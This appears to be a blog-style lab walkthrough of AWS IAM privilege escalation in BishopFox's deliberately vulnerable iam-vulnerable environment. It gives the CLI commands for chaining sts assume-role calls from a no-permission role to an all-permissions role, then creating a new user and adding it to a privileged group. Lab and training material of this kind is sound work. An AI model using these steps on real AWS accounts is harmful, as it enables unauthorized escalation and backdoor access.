One of the most common ways to perform illicit privilege escalation in AWS is using weak or stolen credentials. The credentials can be pilfered from an unsecured repository, phished, or obtained in other ways. One of the bad or good things, depending on perspective, about credentials like passwords, access keys, and secret keys, is the amount of time they can be useful for. The lack of expiration lets attackers use these for an extended amount of time.

Alternatively, AWS role assumption is a way to give out temporary credentials just in time, just to trusted entities. https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html

The temporary nature of the credentials makes things much more secure, but there are still ways to abuse role assumption. Improperly configured IAM policies can inadvertently grant excessive privileges to roles and allow too much trust.

We can demo some abusive role assumptions using iam-vulnerable from BishopFox. https://github.com/BishopFox/iam-vulnerable

This sets up 31 users, roles, and policies with a number of various methods to obtain access to the targeted original account. You can set it up to run in an entirely free mode or enable other modules that may generate a cost. Bishop Fox estimates these optional costs here: https://github.com/BishopFox/iam-vulnerable?tab=readme-ov-file#detailed-usage-instructions.

Iam-vulnerable sets up a large number of privilege escalation use cases- from setting up new IAM permissions on other users, passing roles to services, changing permissions on existing policies, and more. Today I wanted to test the STS-AssumeRole module. A linked blog article from n00 gives us more detail on this, and other IAM privilege escalation scenarios in this project : https://pswalia2u.medium.com/aws-iam-privilege-escalation-paths-cba36be1aa9e.

Among the roles provided by Iam-vulnerable, you are given three roles of varying privilege, from low to high.

The starting role can be assumed by your configured testing user and contains permissions to nothing. The starting role, however, is trusted to assume the intermediate role.

The intermediate role, in turn, is trusted to assume the ending role.

The ending role has a policy that allows everything.

To jump this train to high privilege, we start by the usual enumeration to figure out who we are and what we can do. Good places to look for enumeration commands are:

https://docs.aws.amazon.com/cli/latest/reference/

https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-iam-enum

This could take quite a while or you can automate with tools and scripts-more to come on that.

1. Finally, we would uncover potential victims and then we are ready to abuse some trust. In this lab, our initial target is the low privileged user:

aws sts assume-role - role-arn "arn:aws:iam::youraccountid:role/privesc-AssumeRole-starting-role" - role-session-name 'aa2'

where youraccountid is your 12 digit account id number, name your session whatever you want, of course.

We add the credentials given after role assumption to a new profile in the .aws file. Since it is an assumed role, we get a session token that we also add to the credentials file.

aws configure - profile startingrole

1. We use the “startingrole” profile to assume the intermediate privileged role, then enter the intermediate credentials into a new profile.

aws sts assume-role - role-arn "arn:aws:iam::youraccountid:role/privesc-AssumeRole-intermediate-role" - role-session-name 'ab2' - profile startingrole

aws configure - profile middlerole

1. The “middlerole” profile can now assume the high privileged role.

aws sts assume-role - role-arn "arn:aws:iam::youraccountid:role/privesc-AssumeRole-ending-role" - role-session-name 'aa4' - profile middlerole

Now we add the high privileged user to our credentials file:

aws configure - profile everything

Now I can complete my evil master plan using the high privileged profile.

In this case, create a new user and add them to a privileged group. (JustinBieber is my newly inherited diabetic cat who manages to escalate his privileges into every Amazon box he can find):

aws iam create-user - user-name JustinBieber - profile everything
aws iam add-user-to-group - group-name privesc-sre-group - user-name JustinBieber

Here’s to creating your own evil master plan, abusing trust and assuming roles.